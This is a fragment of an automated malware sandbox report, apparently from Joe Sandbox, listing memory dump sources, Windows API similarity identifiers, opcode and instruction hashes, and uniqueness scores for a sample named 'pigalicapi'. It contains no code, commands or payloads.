                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4020351045-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
                                                                                                                                                                                                                                                                                                        • Instruction ID: 15fce7b54c8e5e1fc0f85ba65380c6ebfde49fb6f69f57a2b6804990dbcebb8c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4610c1a5b9857c503adf5da19f6fa4e820977606d10de2c50b457a4da0e04751
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0018B70B00201CFC700EFB8E58452ABBE0BF44304B94497EE889D7390E778E859CB5A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 682475483-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
                                                                                                                                                                                                                                                                                                        • Instruction ID: aa3a49ff768a6b075f2888eed2ac29caeab34b7e920cbfe53a71fda84f8aa413
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c84c1ffd8b1c17e096c6591a1ead9b1f70f7a80ca5ad25b355e63b48a2b1e91
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6F06D76A00704ABC720BFB9A94855ABBB4FF84350F450539DC9593300D738B819CADA
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%